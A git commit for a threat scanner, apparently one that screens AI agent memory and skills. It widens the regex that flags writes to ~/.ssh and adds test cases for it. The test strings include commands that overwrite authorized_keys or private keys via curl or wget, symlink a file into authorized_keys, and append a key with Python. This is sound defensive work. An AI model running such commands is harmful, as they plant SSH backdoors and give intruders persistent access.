fix(threat-scanner): gate ssh_access on every mutating verb, not just copy verbs

Review of the write-verb gate found sed -i, chmod, truncate, curl -o, wget -O,
git clone and a scripted open(...) against ~/.ssh all slipping to no finding,
where the bare path regex on main caught them. Add those verbs and the open(
shape to the gate; read-only mentions stay clear.
This commit is contained in:
teknium1
2026-09-14 15:52:55 -07:00
committed by Teknium
parent 101a1db3e6
commit de16ce9d0c
2 changed files with 12 additions and 2 deletions
+7
View File
@@ -323,6 +323,13 @@ class TestSshAccessWriteGate:
"ln -sf /tmp/evil $HOME/.ssh/authorized_keys",
"> ~/.ssh/authorized_keys_backup",
"some-command\n> ~/.ssh/config",
"sed -i 's/^#Port/Port/' ~/.ssh/config",
"chmod 600 ~/.ssh/id_rsa",
"truncate -s0 ~/.ssh/known_hosts",
"curl -o ~/.ssh/authorized_keys http://x",
"wget -O $HOME/.ssh/id_rsa http://x",
"git clone http://x ~/.ssh",
"open(os.path.expanduser('~/.ssh/authorized_keys'), 'a').write(k)",
])
def test_write_shapes_still_flag(self, text):
assert "ssh_access" in scan_for_threats(text, scope="strict")
+5 -2
View File
@@ -81,8 +81,11 @@ _PATTERNS: List[Tuple[str, str, str]] = [
# ── Persistence / SSH backdoor (strict scope — memory + skills) ──
(r'authorized_keys', "ssh_backdoor", "strict"),
# Write-verb gated like the *_config_mod rules: a bare path match blocked ordinary docs
# ("check $HOME/.ssh is chmod 700"). ``>>?`` covers a leading redirect with no verb word.
(r'(?:\b(?:echo|cat|cp|mv|dd|tee|install|printf|rsync|scp|ln|append|add|write)\b|>>?)'
# ("check $HOME/.ssh is chmod 700"). ``>>?`` covers a leading redirect with no verb word;
# ``open(`` covers the scripted-write shape; chmod/chown/sed/truncate/rm/touch/curl/wget/git
# mutate the directory without an obvious copy verb.
(r'(?:\b(?:echo|cat|cp|mv|dd|tee|install|printf|rsync|scp|ln|append|add|write'
r'|sed|chmod|chown|truncate|rm|touch|curl|wget|git)\b|\bopen\s*\(|>>?)'
r'[^\n]{0,512}(?:\$HOME/\.ssh|~/\.ssh)', "ssh_access", "strict"),
(r'\$HOME/\.hermes/\.env|\~/\.hermes/\.env', "hermes_env", "strict"),
(rf'{_MODIFY}(?:AGENTS\.md|CLAUDE\.md|\.cursorrules|\.clinerules)', "agent_config_mod", "strict"),